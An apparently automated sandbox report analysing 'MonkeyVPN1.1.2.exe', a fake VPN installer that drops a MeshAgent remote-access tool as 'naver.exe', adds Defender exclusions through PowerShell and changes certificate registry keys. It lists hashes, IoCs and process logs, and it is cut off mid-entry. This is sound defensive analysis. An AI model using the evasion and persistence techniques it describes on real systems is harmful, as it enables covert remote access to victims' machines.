Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 07:04
General
-
Target
MonkeyVPN1.1.2.exe
-
Size
43.2MB
-
MD5
f3696254e6992deccbff25ab0af2ebc8
-
SHA1
54ca8798c4e4eb8a455769ab706cc3de7fa1917d
-
SHA256
ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3
-
SHA512
fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7
-
SSDEEP
786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 25 2912 powershell.exe 27 2912 powershell.exe 29 2912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 4472 powershell.exe 3512 powershell.exe 3756 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 4 IoCs
Processes:
start.exenaver.exenaver.exenaver.exepid process 3452 start.exe 1996 naver.exe 2292 naver.exe 1700 naver.exe -
Loads dropped DLL 2 IoCs
Processes:
MsiExec.exepid process 384 MsiExec.exe 384 MsiExec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Drops file in System32 directory 64 IoCs
Processes:
naver.exenaver.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\7383D564EDAD5424C4A403B98B7191F091F3DD98 naver.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F1F1B0B6369A84B2B68552FDC57ABDEB60805A02 naver.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\ntasn1.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys naver.exe File opened for modification C:\Windows\System32\win32u.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe -
Processes:
resource yara_rule behavioral1/memory/4728-0-0x0000000000160000-0x00000000032FF000-memory.dmp upx behavioral1/memory/4728-49-0x0000000000160000-0x00000000032FF000-memory.dmp upx behavioral1/memory/4728-51-0x0000000000160000-0x00000000032FF000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
start.exemsiexec.exeMsiExec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language start.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Modifies data under HKEY_USERS 53 IoCs
Processes:
powershell.exenaver.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716351390355006" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe -
Processes:
MonkeyVPN1.1.2.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 MonkeyVPN1.1.2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 MonkeyVPN1.1.2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 MonkeyVPN1.1.2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exemsedge.exepid process 4472 powershell.exe 2912 powershell.exe 2912 powershell.exe 4472 powershell.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4472 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeShutdownPrivilege 3340 msiexec.exe Token: SeIncreaseQuotaPrivilege 3340 msiexec.exe Token: SeSecurityPrivilege 4712 msiexec.exe Token: SeCreateTokenPrivilege 3340 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3340 msiexec.exe Token: SeLockMemoryPrivilege 3340 msiexec.exe Token: SeIncreaseQuotaPrivilege 3340 msiexec.exe Token: SeMachineAccountPrivilege 3340 msiexec.exe Token: SeTcbPrivilege 3340 msiexec.exe Token: SeSecurityPrivilege 3340 msiexec.exe Token: SeTakeOwnershipPrivilege 3340 msiexec.exe Token: SeLoadDriverPrivilege 3340 msiexec.exe Token: SeSystemProfilePrivilege 3340 msiexec.exe Token: SeSystemtimePrivilege 3340 msiexec.exe Token: SeProfSingleProcessPrivilege 3340 msiexec.exe Token: SeIncBasePriorityPrivilege 3340 msiexec.exe Token: SeCreatePagefilePrivilege 3340 msiexec.exe Token: SeCreatePermanentPrivilege 3340 msiexec.exe Token: SeBackupPrivilege 3340 msiexec.exe Token: SeRestorePrivilege 3340 msiexec.exe Token: SeShutdownPrivilege 3340 msiexec.exe Token: SeDebugPrivilege 3340 msiexec.exe Token: SeAuditPrivilege 3340 msiexec.exe Token: SeSystemEnvironmentPrivilege 3340 msiexec.exe Token: SeChangeNotifyPrivilege 3340 msiexec.exe Token: SeRemoteShutdownPrivilege 3340 msiexec.exe Token: SeUndockPrivilege 3340 msiexec.exe Token: SeSyncAgentPrivilege 3340 msiexec.exe Token: SeEnableDelegationPrivilege 3340 msiexec.exe Token: SeManageVolumePrivilege 3340 msiexec.exe Token: SeImpersonatePrivilege 3340 msiexec.exe Token: SeCreateGlobalPrivilege 3340 msiexec.exe Token: SeCreateTokenPrivilege 3340 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3340 msiexec.exe Token: SeLockMemoryPrivilege 3340 msiexec.exe Token: SeIncreaseQuotaPrivilege 3340 msiexec.exe Token: SeMachineAccountPrivilege 3340 msiexec.exe Token: SeTcbPrivilege 3340 msiexec.exe Token: SeSecurityPrivilege 3340 msiexec.exe Token: SeTakeOwnershipPrivilege 3340 msiexec.exe Token: SeLoadDriverPrivilege 3340 msiexec.exe Token: SeSystemProfilePrivilege 3340 msiexec.exe Token: SeSystemtimePrivilege 3340 msiexec.exe Token: SeProfSingleProcessPrivilege 3340 msiexec.exe Token: SeIncBasePriorityPrivilege 3340 msiexec.exe Token: SeCreatePagefilePrivilege 3340 msiexec.exe Token: SeCreatePermanentPrivilege 3340 msiexec.exe Token: SeBackupPrivilege 3340 msiexec.exe Token: SeRestorePrivilege 3340 msiexec.exe Token: SeShutdownPrivilege 3340 msiexec.exe Token: SeDebugPrivilege 3340 msiexec.exe Token: SeAuditPrivilege 3340 msiexec.exe Token: SeSystemEnvironmentPrivilege 3340 msiexec.exe Token: SeChangeNotifyPrivilege 3340 msiexec.exe Token: SeRemoteShutdownPrivilege 3340 msiexec.exe Token: SeUndockPrivilege 3340 msiexec.exe Token: SeSyncAgentPrivilege 3340 msiexec.exe Token: SeEnableDelegationPrivilege 3340 msiexec.exe Token: SeManageVolumePrivilege 3340 msiexec.exe Token: SeImpersonatePrivilege 3340 msiexec.exe Token: SeCreateGlobalPrivilege 3340 msiexec.exe Token: SeCreateTokenPrivilege 3340 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 3340 msiexec.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
MonkeyVPN1.1.2.execmd.exestart.exemsiexec.exepowershell.exemsedge.exechrome.exenaver.exenaver.exedescription pid process target process PID 4728 wrote to memory of 4472 4728 MonkeyVPN1.1.2.exe powershell.exe PID 4728 wrote to memory of 4472 4728 MonkeyVPN1.1.2.exe powershell.exe PID 4728 wrote to memory of 2912 4728 MonkeyVPN1.1.2.exe powershell.exe PID 4728 wrote to memory of 2912 4728 MonkeyVPN1.1.2.exe powershell.exe PID 4728 wrote to memory of 1044 4728 MonkeyVPN1.1.2.exe cmd.exe PID 4728 wrote to memory of 1044 4728 MonkeyVPN1.1.2.exe cmd.exe PID 1044 wrote to memory of 3452 1044 cmd.exe start.exe PID 1044 wrote to memory of 3452 1044 cmd.exe start.exe PID 1044 wrote to memory of 3452 1044 cmd.exe start.exe PID 3452 wrote to memory of 3340 3452 start.exe msiexec.exe PID 3452 wrote to memory of 3340 3452 start.exe msiexec.exe PID 3452 wrote to memory of 3340 3452 start.exe msiexec.exe PID 4712 wrote 